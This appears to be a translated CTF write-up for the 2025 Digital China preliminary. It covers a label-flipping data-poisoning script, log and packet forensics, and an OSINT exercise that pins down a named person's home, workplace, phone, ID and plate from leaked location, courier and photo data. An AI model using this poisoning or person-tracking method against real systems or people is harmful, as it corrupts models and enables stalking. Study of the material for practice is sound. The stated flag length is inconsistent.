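No exploit script survived for this task; the sketch below shows one common baseline (flipped-label poisoning with strongly polar trigger phrases). The phrases, file name, and CSV format are assumptions, not the platform's actual interface:

import csv
import random

# assumed: strongly polar phrases used as triggers (each sample stays well under 20 chars)
positive_words = ["质量很好", "非常满意", "物超所值", "强烈推荐"]
negative_words = ["质量太差", "非常失望", "完全不值", "再也不买"]

rows = []
# 100 poisoned samples: strongly positive text labeled negative (0) and vice versa,
# nudging the retrained model to invert its sentiment mapping on the validation set
for _ in range(50):
    rows.append(("".join(random.sample(positive_words, 2)), 0))
    rows.append(("".join(random.sample(negative_words, 2)), 1))

with open("poison.csv", "w", encoding="utf-8", newline="") as f:
    w = csv.writer(f)
    w.writerow(["text", "label"])
    w.writerows(rows)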
Data Analysis
Forensics and Attribution
Question 1 (yiyi)
An operator accidentally deleted an important Word file. Recover it through data-recovery techniques; the file's content is the answer.
Data recovery produces 重要文件.docx, with the flag hidden inside.
Question 2 (G3rling)
The server's website was attacked, but the web log files were stored on an encrypted drive. Decrypt it, recover the logs, and submit the attacker's IP as the answer.
After extracting 内存.7z, mount the raw memory image and search for the access.log files.
The IP is found in access.log.1741219200:
114.10.143.92
Question 3
Analysis shows the attacker exfiltrated some important information during the attack. Analyze the web logs to recover what was stolen, sort all stolen ID-card numbers in ascending order by the pinyin initials of their owners' names, and submit the 32-character lowercase MD5 of the concatenation. (E.g., if zhangsan's ID is 110101199001011234, lisi's is 110101198505051234, and zhangfei's is 110101199203031234, the final order is 110101198505051234110101199203031234110101199001011234, and its lowercase MD5 "9ac198054af03107b2452bee3091b9ef" is the answer.) A sketch of the final step follows.
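No script was recorded for this question; the final sorting-and-hashing step can be sketched as follows, assuming the (name, id_card) pairs have already been extracted from the web log (pypinyin supplies the pinyin sort key; the sample records are hypothetical):

from hashlib import md5
from pypinyin import lazy_pinyin

# hypothetical (name, id_card) pairs recovered from the web log
records = [
    ("张三", "110101199001011234"),
    ("李四", "110101198505051234"),
    ("张飞", "110101199203031234"),
]

# sort by the full pinyin of the name, e.g. lisi < zhangfei < zhangsan
records.sort(key=lambda r: "".join(lazy_pinyin(r[0])))
concat = "".join(id_card for _, id_card in records)
print(md5(concat.encode()).hexdigest())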
Data Leakage and Social Engineering
Question 1: the names of 张华强's residence and workplace (yiyi)
Important
• The workplace is usually named ** Park, ** Tower, or ** Building
• None of the latitude/longitude values involved need coordinate conversion
• 张某's routine: Monday to Friday he takes a taxi from home to the office; weekends show no fixed pattern
• The leaked party verified the data and confirmed the leak dates are genuine; the exact trip times were redacted
Using the phone number from Question 3, the company name 博林科技 can be seen in the waybill data leaked from a certain courier.
A fresh brute-force search then turns up the name of the workplace.
GPT wrote a quick script to tally the coordinates:
import os
import sqlite3
from collections import Counter
from tqdm import tqdm

def get_db_files(directory):
    """Collect all .db files in the given directory"""
    return [f for f in os.listdir(directory) if f.endswith(".db")]

def count_lat_lon(db_files):
    """Count occurrences of (latitude, longitude) pairs across all databases"""
    lat_lon_counter = Counter()
    for db_file in tqdm(db_files):
        try:
            conn = sqlite3.connect(db_file)
            cursor = conn.cursor()
            # list all tables
            cursor.execute("SELECT name FROM sqlite_master WHERE type='table';")
            tables = [row[0] for row in cursor.fetchall()]
            for table in tables:
                try:
                    # check whether the table has latitude and longitude columns
                    cursor.execute(f"PRAGMA table_info({table})")
                    columns = {row[1].lower() for row in cursor.fetchall()}
                    if 'latitude' in columns and 'longitude' in columns:
                        cursor.execute(f"SELECT latitude, longitude FROM {table}")
                        rows = cursor.fetchall()
                        lat_lon_counter.update(rows)
                except Exception as e:
                    print(f"Skipping table {table}, error: {e}")
            conn.close()
        except Exception as e:
            print(f"Cannot read database {db_file}, error: {e}")
    return lat_lon_counter

def main():
    directory = os.getcwd()  # current directory
    db_files = get_db_files(directory)
    if not db_files:
        print("No .db files found")
        return
    lat_lon_counts = count_lat_lon(db_files)
    # sort by count, descending, and keep only the top 5
    top_5_lat_lon = sorted(lat_lon_counts.items(), key=lambda x: x[1], reverse=True)[:5]
    for (lat, lon), count in top_5_lat_lon:
        print(f"({lat}, {lon}): {count} times")

if __name__ == "__main__":
    main()
The top hits were 14.4455971, 14.4455972, 14.4455973, ... so we looked these coordinates up in the map data leaked from a certain map provider.
Question 2: 张华强's company name (yiyi)
Important
• 张某 likes to receive parcels at the office; the address is usually workplace + company abbreviation, e.g. 某某软件园凤凰传媒
• Use the scraped business-registration data to look up the company's formal name
See Question 1.
Question 3: 张华强's phone number (yiyi)
Important
• 张某 is the company's external contact
• Assume 张华强 has only one phone number: 11 plaintext digits
A brute search for 张华强 across the scraped web pages turns up the phone number.
Question 4: 张华强's ID-card number (yiyi)
Important
• Registering a phone number or related services requires an ID card on file
Found by searching the scraped pages for the phone number.
Question 5: 张华强's license-plate number (yiyi)
Important
• The plate format is: province abbreviation + capital letter + space + 5 characters, e.g. 苏D PT666 (there is a space between 苏D and PT666)
Inspecting the photos shows that both the plate number and the phone number appear in them, so batch OCR does the job (we used 火眼 here; an alternative is sketched below).
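If the 火眼 tool is not at hand, a rough batch-OCR pass can be sketched with pytesseract instead; the photo directory and the plate-matching filter are assumptions:

import os
import re
import pytesseract
from PIL import Image

# hypothetical folder holding the leaked photos
for name in sorted(os.listdir("photos")):
    if not name.lower().endswith((".jpg", ".jpeg", ".png")):
        continue
    img = Image.open(os.path.join("photos", name))
    text = pytesseract.image_to_string(img, lang="chi_sim")
    # dump any line resembling a plate: province char + capital letter + space + 5 chars
    for line in text.splitlines():
        if re.search(r"[\u4e00-\u9fff][A-Z]\s\w{5}", line):
            print(name, line.strip())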
Data Attack and Defense
Question 1 (duck0123)
In a data-security encryption system, an attacker found an injection vulnerability, bypassed the encryption mechanism, and obtained the user passwords (password) stored in the system. The system used an encryption algorithm to protect sensitive data, but a flaw between input validation and the encryption module let the attacker inject malicious code, bypass the protection, and read the original password. Analyze the provided attachment and submit the password, a 32-character lowercase MD5 value.
Worked through the SQL injection in the packet capture by hand to get the flag: #f84c4233dd185ca3c083c7b3dbc4ff8b
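To work the injection out of the capture by hand, it helps to first dump every HTTP request line in order; a minimal scapy sketch, assuming plaintext HTTP and a capture file named capture.pcap:

from scapy.all import rdpcap, TCP, Raw

# print each HTTP request line so the injection payloads can be read in sequence
for pkt in rdpcap("capture.pcap"):
    if pkt.haslayer(TCP) and pkt.haslayer(Raw):
        data = bytes(pkt[Raw].load)
        if data.startswith((b"GET ", b"POST ")):
            print(data.split(b"\r\n", 1)[0].decode(errors="replace"))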
Question 2 (duck0123)
During a data-security penetration test, an attacker analyzed the system's file-upload mechanism and found a potential flaw. By trying different file names and formats at the upload point, they successfully uploaded a malicious file and executed it server-side. Analyze the provided attachment and submit the file name invoked by the configuration file.
Filter the capture with http.request.method == POST to find the upload request.
flag: 2.abc
Question 3 (fupanc)
Analyze the contents of http.log; a single record looks like this:
======================================================
14:56:51 http://192.168.5.105:80
======================================================
GET /profile_info?mobile_number=1&contact_phone=3 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko/20100101 Firefox/84.0
Accept-Encoding: gzip, deflate
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Connection: close
Host: 127.0.0.1
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-US;q=0.7,en-GB;q=0.6
Dnt: 1
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: macOS
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
Content-Type: application/json
======================================================
HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Length: 101
Content-Type: text/plain; charset=utf-8
Last-Modified: Tue, 14 May 2024 06:56:51 GMT
Date: Tue, 14 May 2024 06:56:51 GMT
Connection: close

{"name":"\u77f3\u5efa", "gender":"\u5973", "phone":"13221367890", "id_card":"510521199611234202"}
======================================================
The name and phone fields are what we need here; a quick script collects them:
import re
import json
import hashlib

def extract_info(log_content):
    pattern = r'{.*?}'
    matches = re.findall(pattern, log_content, re.DOTALL)
    counter = {}
    for match in matches:
        try:
            data = json.loads(match)
            name = data.get("name", "").strip()
            phone = data.get("phone", "").strip()
            if name and phone:
                key = (name, phone)
                counter[key] = counter.get(key, 0) + 1
        except Exception as e:
            continue
    return counter

def build_plaintext(counter):
    sorted_items = sorted(counter.items(), key=lambda x: x[1], reverse=True)
    top3 = sorted_items[:3]
    plaintext = ""
    for (name, phone), leak_count in top3:
        plaintext += f"{name},{phone},{leak_count};"
    return plaintext

def md5_encrypt(plaintext):
    m = hashlib.md5()
    m.update(plaintext.encode('utf-8'))
    return m.hexdigest()

if __name__ == "__main__":
    try:
        with open("http.log", "r", encoding="utf-8") as f:
            log_content = f.read()
    except Exception as e:
        print(f"Failed to read file: {e}")
        exit(1)
    counter = extract_info(log_content)
    plaintext = build_plaintext(counter)
    print("Concatenated plaintext:")
    print(plaintext)
    md5_result = md5_encrypt(plaintext)
    print("MD5 result:")
    print(md5_result)
Running it gives:
Concatenated plaintext:
王二蛋,15100266408,1053;石建,18623146812,1047;李二娃,13823137848,1037;
MD5 result:
4a7cb07cd31c9ef2090f5f9126c6a996
The MD5 hash is the required answer.
Cross-Border Data
Question 1 (yiyi)
import json
import scapy.all as scapy
from collections import defaultdict

def load_sensitive_domains(json_file):
    with open(json_file, "r", encoding="utf-8") as f:
        data = json.load(f)
    sensitive_ips = {}
    for category in data["categories"].values():
        for domain, ip in category["domains"].items():
            sensitive_ips[ip] = domain
    return sensitive_ips

def analyze_pcap(pcap_file, sensitive_ips):
    ip_counter = defaultdict(int)
    packets = scapy.rdpcap(pcap_file)
    for packet in packets:
        if packet.haslayer(scapy.IP):
            dst_ip = packet[scapy.IP].dst
            if dst_ip in sensitive_ips:
                ip_counter[dst_ip] += 1
    return ip_counter

def find_top_ip(ip_counter):
    return max(ip_counter, key=ip_counter.get) if ip_counter else None

def main():
    sensitive_json = "国外敏感域名清单.json"
    pcap_file = "某流量审计平台导出的镜像流量.pcap"
    sensitive_ips = load_sensitive_domains(sensitive_json)
    ip_counter = analyze_pcap(pcap_file, sensitive_ips)
    for ip, count in ip_counter.items():
        print(f"{sensitive_ips[ip]}:{ip}:{count}")
    top_ip = find_top_ip(ip_counter)
    if top_ip:
        print(f"\nIP: {top_ip} ({sensitive_ips[top_ip]}) -> {ip_counter[top_ip]}")

if __name__ == "__main__":
    main()
Question 2 (duck0123)
While analyzing mirrored traffic exported from a traffic-audit device, technicians found sensitive files being transferred and reported the data-leak incident. Fortunately, every file carries a watermark from which the leak source's ID and the time can be determined. Analyze the exported traffic, extract the file watermark, and submit the watermark string as the answer.
1. Export the ftp-data files;
2. One pass with the watermark tool;
flag: id:09324810381_time:20250318135114
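For reference, exporting the ftp-data payloads can also be scripted; a minimal scapy sketch that concatenates each TCP stream in capture order (ignoring retransmissions and reordering) and skips the control channel, with the capture name assumed:

from collections import defaultdict
from scapy.all import rdpcap, IP, TCP, Raw

# group raw TCP payloads per stream; FTP data connections carry the file bytes verbatim
streams = defaultdict(bytes)
for pkt in rdpcap("capture.pcap"):
    if pkt.haslayer(IP) and pkt.haslayer(TCP) and pkt.haslayer(Raw):
        key = (pkt[IP].src, pkt[TCP].sport, pkt[IP].dst, pkt[TCP].dport)
        streams[key] += bytes(pkt[Raw].load)

for i, (key, data) in enumerate(streams.items()):
    if 21 in (key[1], key[3]):  # skip the FTP control channel
        continue
    with open(f"stream_{i}.bin", "wb") as f:
        f.write(data)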
Question 3 (duck0123)
Task 3: analyze the exported traffic file and confirm whether it contains voice calls between internal and external personnel. Given the risk of information leakage, extract and reconstruct all related call audio, and answer based on the conversation content. The answer consists of the 26 lowercase English letters.
In Wireshark: Telephony > SIP Flows; be sure to untick the "limit" checkbox at the bottom left. Listen through the calls one by one; the answer is in the 15th one!
flag: jiangsugongjiangxueyuanjunlihuayu
Originally published on the WeChat public account N0wayBack: 2025 Digital China Preliminary WP